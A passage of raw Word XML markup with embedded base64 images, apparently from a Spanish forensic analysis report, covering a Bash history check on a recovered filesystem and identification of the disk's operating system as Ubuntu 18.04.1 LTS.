QBWHkyzPwXeZJMRumDbznbUHKu92Q98UreDZoPL480hPvrfsJMULwRWD2CMZ8vREL&#10;g1tgS/RzGDbqdXyx67x+yIyVeImIiEjgiIiMxgq+CBrm+bFl22RLMCs/9Da2uiYiIro10xkwjaA8&#10;A6aBXdsCmdNw7B6XgZzZHuVFaxtLI76P+vcv4dM1Gu1XnELiaHF/bSIiIi0h06S2qptrqt+4Tzg2&#10;NAEzYG6t/jNgiIiI6J9y368y+XtnIn4874jgENfGD75oNdz7XMevK7/AN8lbsCszEzs2fINp4XOx&#10;x3o4nvN5QJxDRERERERERP+E+zwAcxXpiRtwoesohPRqCuGXBnwf9XnIdybiU1kwBj81CAHjZuIn&#10;ixDEbfoPgh+8zeLBRERERERERGSSxOHBxzR5RcZ78zWORluCRERERLckLPWprermmuo37hOODU3A&#10;JUi3xiVIREREdw8z1LFELBERERERERER1c19XwOGiIiIiIiIiKh+Af8P3T+fLoGwLQgAAAAASUVO&#10;RK5CYIJQSwMEFAAGAAgAAAAhALrw0hrgAAAACAEAAA8AAABkcnMvZG93bnJldi54bWxMj0FvgkAQ&#10;he9N+h82Y9JbXZAKBhmMMW1Ppkm1SdPbCCMQ2V3CroD/vttTPb55k/e+l20m1YqBe9sYjRDOAxCs&#10;C1M2ukL4Or49r0BYR7qk1mhGuLGFTf74kFFamlF/8nBwlfAh2qaEUDvXpVLaomZFdm461t47m16R&#10;87KvZNnT6MNVKxdBEEtFjfYNNXW8q7m4HK4K4X2kcRuFr8P+ct7dfo7Lj+99yIhPs2m7BuF4cv/P&#10;8Ifv0SH3TCdz1aUVLYIf4hCiKE5AeHu1TPzlhBAvXhKQeSbvB+S/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WiW6J7AwAAFQgAAA4AAAAAAAAAAAAAAAAAOgIA&#10;AGRycy9lMm9Eb2MueG1sUEsBAi0ACgAAAAAAAAAhAOkczMwm1AAAJtQAABQAAAAAAAAAAAAAAAAA&#10;4QUAAGRycy9tZWRpYS9pbWFnZTEucG5nUEsBAi0AFAAGAAgAAAAhALrw0hrgAAAACAEAAA8AAAAA&#10;AAAAAAAAAAAAOdoAAGRycy9kb3ducmV2LnhtbFBLAQItABQABgAIAAAAIQCqJg6+vAAAACEBAAAZ&#10;AAAAAAAAAAAAAAAAAEbbAABkcnMvX3JlbHMvZTJvRG9jLnhtbC5yZWxzUEsFBgAAAAAGAAYAfAEA&#10;ADncAAAAAA==&#10;">
                <v:shape id="Imagen 73" o:spid="_x0000_s1179" type="#_x0000_t75" style="position:absolute;width:54406;height:13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L8yQAAAOIAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9NS8NA&#10;EIbvQv/DMgUvxW78oMS02yJqQJAemoq9DtlpEpqdDZm1Xf+9KwgeH955n5lZbaLr1ZlG6TwbuJ1n&#10;oIhrbztuDHzsy5sclARki71nMvBNApv15GqFhfUX3tG5Co1KEpYCDbQhDIXWUrfkUOZ+IE7Z0Y8O&#10;Q8Kx0XbES5K7Xt9l2UI77DhtaHGg55bqU/XlDMj2tcxe8nf/KdUh6llZz2IlxlxP49MSVKAY/of/&#10;2m82nZ+Mi8f7/AF+X0oMev0DAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAA&#10;AAAAAAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAV&#10;AQAACwAAAAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAFoQS/MkAAADi&#10;AAAADwAAAAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAP0CAAAA&#10;AA==&#10;">
                  <v:imagedata r:id="rId209" o:title=""/>
                </v:shape>
                <v:shape id="_x0000_s1180" type="#_x0000_t202" style="position:absolute;left:531;top:14135;width:53893;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YxJzAAAAOIAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9BS8NA&#10;FITvgv9heYIXsRtNTTR2W0pRsF6KsRdvj+xrNpp9G3Y3bfz3riB4HGbmG2axmmwvjuRD51jBzSwD&#10;Qdw43XGrYP/+fH0PIkRkjb1jUvBNAVbL87MFVtqd+I2OdWxFgnCoUIGJcaikDI0hi2HmBuLkHZy3&#10;GJP0rdQeTwlue3mbZYW02HFaMDjQxlDzVY9WwW7+sTNX4+HpdT3P/XY/borPtlbq8mJaP4KINMX/&#10;8F/7RSvIi7siL8vyAX4vpTsglz8AAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMA&#10;AAAAAAAAAAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78A&#10;AAAVAQAACwAAAAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAdymMScwA&#10;AADiAAAADwAAAAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAAAD&#10;AAAAAA==&#10;" stroked="f">
                  <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="3F81CDD9" w14:textId="19D4D1C6" w:rsidR="00915A6C" w:rsidRPr="00481B45" w:rsidRDefault="00915A6C" w:rsidP="00915A6C">
                        <w:pPr>
                          <w:pStyle w:val="Descripcin"/>
                          <w:rPr>
                            <w:rFonts w:cs="Arial"/>
                            <w:noProof/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:t xml:space="preserve">Ilustración </w:t>
                        </w:r>
                        <w:fldSimple w:instr=" SEQ Ilustración \* ARABIC ">
                          <w:r w:rsidR="00117A4E">
                            <w:rPr>
                              <w:noProof/>
                            </w:rPr>
                            <w:t>47</w:t>
                          </w:r>
                        </w:fldSimple>
                        <w:r>
                          <w:t xml:space="preserve">: </w:t>
                        </w:r>
                        <w:bookmarkStart w:id="120" w:name="_Toc155782614"/>
                        <w:r w:rsidRPr="00B56EE2">
                          <w:t>Comprobación del archivo Bash history del recover filesystem y de la captura del disco duro.</w:t>
                        </w:r>
                        <w:bookmarkEnd w:id="120"/>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:shape>
                <w10:wrap type="square" anchorx="margin"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="00A703AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">donde se puede comprobar </w:t>
      </w:r>
      <w:r w:rsidR="00454796">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>la</w:t>
      </w:r>
      <w:r w:rsidRPr="00A703AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> acción.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CA60718" w14:textId="4310A90F" w:rsidR="003B7B22" w:rsidRDefault="003B7B22" w:rsidP="00A703AB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>A continuación procederemos a corroborar el sistema operativo que aloja en la memoria del Disco Duro</w:t>
      </w:r>
      <w:r w:rsidR="00BB27B6">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, para ello, entramos en el apartado de Operating System Information, dentro del apartado de Artifact, en </w:t>
      </w:r>
      <w:r w:rsidR="00443705">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>él</w:t>
      </w:r>
      <w:r w:rsidR="00BB27B6">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> se observa que la descripción de la distribución es  </w:t>
      </w:r>
      <w:r w:rsidR="00BB27B6" w:rsidRPr="00BB27B6">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>DISTRIB_DESCRIPTION="Ubuntu</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>Ubuntu: Una distribución de Linux basada en Debian, popular por su facilidad de uso.</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>"</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00BB27B6" w:rsidRPr="00BB27B6">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve"> 18.04.1 LTS"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="393D1520" w14:textId="69F89A65" w:rsidR="00A703AB" w:rsidRPr="00A703AB" w:rsidRDefault="001A130A" w:rsidP="00A703AB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:noProof/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251794432" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="10623CB5" wp14:editId="26B44BED">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:align>right</wp:align>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>352844</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5816708" cy="1102995"/>
                <wp:effectExtent l="0" t="0" r="0" b="1905"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="131795975" name="Grupo 45"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5816708" cy="1102995"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="5816708" cy="1102995"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="211447165" name="Imagen 113" descr="Interfaz de usuario gráfica, Texto, Aplicación&#10;&#10;Descripción generada automáticamente"/>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4166870" cy="1102995"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <wps:wsp>
                        <wps:cNvPr id="1468713716" name="Cuadro de texto 1"/>
                        <wps:cNvSpPr txBox="1"/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="4295248" y="233917"/>
                            <a:ext cx="1521460" cy="415290"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:solidFill>
                            <a:prstClr val="white"/>
                          </a:solidFill>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="61960E0C" w14:textId="2E1A4DFC" w:rsidR="00915A6C" w:rsidRPr="006D33DA" w:rsidRDefault="00915A6C" w:rsidP="00915A6C">
                              <w:pPr>
                                <w:pStyle w:val="Descripcin"/>
                                <w:rPr>
                                  <w:rFonts w:cs="Arial"/>
                                  <w:noProof/>
                                </w:rPr>
                              </w:pPr>
                              <w:r>
                                <w:t xml:space="preserve">Ilustración </w:t>
                              </w:r>
                              <w:fldSimple w:instr=" SEQ Ilustración \* ARABIC ">
                                <w:r w:rsidR="00117A4E">
                                  <w:rPr>
                                    <w:noProof/>
                                  </w:rPr>
                                  <w:t>48</w:t>
                                </w:r>
                              </w:fldSimple>
                              <w:r>
                                <w:t xml:space="preserve">: </w:t>
                              </w:r>
                              <w:bookmarkStart w:id="121" w:name="_Toc155782615"/>
                              <w:r w:rsidRPr="00DE063C">
                                <w:t>Descripción del sistema operativo.</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623CB5" id="Grupo 45" o:spid="_x0000_s1181" style="position:absolute;left:0;text-align:left;margin-left:406.8pt;margin-top:27.8pt;width:458pt;height:86.85pt;z-index:251794432;mso-position-horizontal:right;mso-position-horizontal-relative:margin" coordsize="58167,11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